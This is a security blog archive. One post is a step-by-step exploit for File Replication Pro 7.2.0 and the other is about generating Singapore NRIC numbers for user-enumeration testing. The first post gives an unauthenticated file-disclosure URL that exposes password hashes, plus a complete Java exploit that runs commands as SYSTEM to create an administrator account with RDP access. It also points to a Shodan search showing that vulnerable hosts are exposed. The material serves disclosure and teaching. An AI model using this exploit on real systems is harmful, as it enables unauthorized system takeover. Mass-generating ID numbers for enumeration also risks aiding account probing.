Category Archives: programming

Exploiting File Replication Pro 7.2.0

* The information found in this post is for educational purposes only and not to be used for illegal purposes *

Recently, a security advisory on the vulnerabilities found in File Replication Pro 7.2.0 was released on this site. This post shows the steps involved to remotely gain access to the system that has this software installed. As of the date of this post, the trial version of FRP 7.2.0 is still available for download at http://www.filereplicationpro.com.

* Note: A quick search on shodan.io with the keywords “FRP Node Ready” shows quite a number of vulnerable systems out there. *

That aside, the first step will be to install the software. We will be using a Windows 7 machine for this demonstration. After running the installer , there will be a few services added to startup, namely 3 ‘prunsrv.exe’ processes as shown below. Note that the services are running under the privileges of the NT AUTHORITY\SYSTEM account:

frp1

The unauthenticated remote command execution vulnerability will be exploiting the way these processes handle password authentication to achieve command execution as the NT AUTHORITY\SYSTEM user. Using a browser, navigate to the localhost’s port 9200, which runs the replication RPC service. You should see the following:

frp2

The “OK” at the end of the “>> FRP Node Ready>> C24EB17AEF0D61>> OK” output indicates that the current RPC server does not require any form of authentication. This is the default behavior in a vanilla install. However, if you see an “ERROR” instead of an “OK”, it means that the RPC server is configured with a password and authentication is required. There is however another vulnerability that exists in the software that allows unauthenticated remote file access which can be abused to retrieve the password hash. FRP password hashes and configurations can be access remotely and unauthenticated using the following link:

http://127.0.0.1:9100/DetailedLogReader.jsp?log_path=C:\Program+Files\FileReplicationPro\\etc\\configuration.xml

You should see the password hash in the configuration.xml file. If more clients have been added to the FRP management server, you will also be able to see all the other password hashes there. If you explore further and take a look into the .jar and .war files that can be found in the installation directory and figure how the software works, you can then proceed to create a malicious RPC client, that in this example, adds an arbitrary user to the remote system, and then adds this user to both the Administrator and RDP groups.

The following exploit code is used in this example. Remember to replace the IP, port, and password variables accordingly:

/**
 * @author Jerold Hoong (Vantage Point Security)
 * File Replication Pro =< v7.2.0
 * Remote Command Execution PoC Working Exploit
 * www.vantagepoint.sg
 * NOTE: Include FRP libraries to compile
 */

import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import net.diasoft.frp.engine.exception.RPCException;
import net.diasoft.frp.engine.model.AddressPort;
import net.diasoft.frp.engine.tcp.client.RPCDriver;
import net.diasoft.frp.engine.tcp.client.TCPConnection;

public class Main {

    static String ip = "1.2.3.4";
    static int port = 9200;
    // password string can be retrieved from remote file disclosure vulnerability (configuration.xml)
    // If no password is set, input blank string for password
    // Use IE to navigate to :9200. OK = NO-AUTH, Error = AUTH

    static String password = ""; // password 12345 jLIjfQZ5yojbZGTqxg2pY0VROWQ=

    public static void main(String[] args) {

        AddressPort ap = new AddressPort(ip, port);
        AddressPort addresses[] = {ap};
        TCPConnection _tcp_connection = null;

        try {
            _tcp_connection = new TCPConnection(addresses, password, true);

        } catch (Exception e) {
            e.printStackTrace();
        }

        System.out.print("Connecting to host...");
        RPCDriver rpc = new RPCDriver(_tcp_connection);
        HashMap p = new HashMap();

        try {
            Map r = rpc.callFunction("ExecCommand", p);
            System.out.print("Success!\n");
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user
        System.out.print("Attempting to add user 'vantagepoint' with password 'LOLrofl1337!': ");
        p.put("COMMAND", "net user vantagepoint LOLrofl1337! /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        // add new user to Admin group
        System.out.print("Attempting to add user 'vantagepoint' to 'Administrators' group: ");
        p.put("COMMAND", "net localgroup \"Administrators\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }

        //add new user to RDP group
        System.out.print("Attempting to add user 'vantagepoint' to 'Remote Desktop Users' group:");
        p.put("COMMAND", "net localgroup \"Remote Desktop Users\" vantagepoint /add");
        try {
            Map r = rpc.callFunction("ExecCommand", p);
        } catch (RPCException e) {
            e.printStackTrace();
        } catch (IOException e) {
            e.printStackTrace();
        } catch (ClassNotFoundException e) {

            e.printStackTrace();
        }
        System.out.print("\n\n---- END ----\n\n");

    }
}

The following screenshot shows the list of users on the Windows 7 system, before the exploit code was executed:

frp3

After the exploit code was successfully executed:

Screen Shot 2016-02-15 at 11.40.51 PM

frp4

frp5

If RDP was not activated on the remote host, you can always tweak the commands in the exploit to activate it. You should now be able to RDP to the box and access the box as an Administrator.

Here is a video showing the exploit in action:

Update: After a long time, the guys at FRP finally released the fixed version: https://frpsupport.fogbugz.com/default.asp?W291

frp2016-730-released

NRIC Number Generation

At times, my job requires the use of “valid” NRIC numbers to conduct certain security testing. There was a time last year where there was a requirement for a sample of approximately 5000 NRIC numbers to conduct user-enumeration tests. I did a quick Google search and found a couple of online generators, but they were clunky and slow and it would probably take ages to generate a sizable sample. There was even this website, http://bit.ly/1ccZXvE that stated: “If you need bulk generation of > 1000 NRIC numbers in any format, please contact me for a quote.” I wonder if this is even legal, so in my curiosity, I proceeded to request for a quotation with a dummy email account (see the email exchange below).

screen-shot-2015-05-04-at-11-44-58-pm

Anyway, I would definitely not pay for stuff like these and decided to do a small research with a good buddy (Joel) of mine on the algorithm behind the generation. After a few minutes, we found the publicly available algorithm online and we started programming a simple generator. 5000 unique NRIC numbers were then generated in less than 1 second, at zero cost. S$30 saved. 🙂

nric-gen

Now that the goodies are in a text file, it would be easy to use it in Burp Intruder and enumerate away…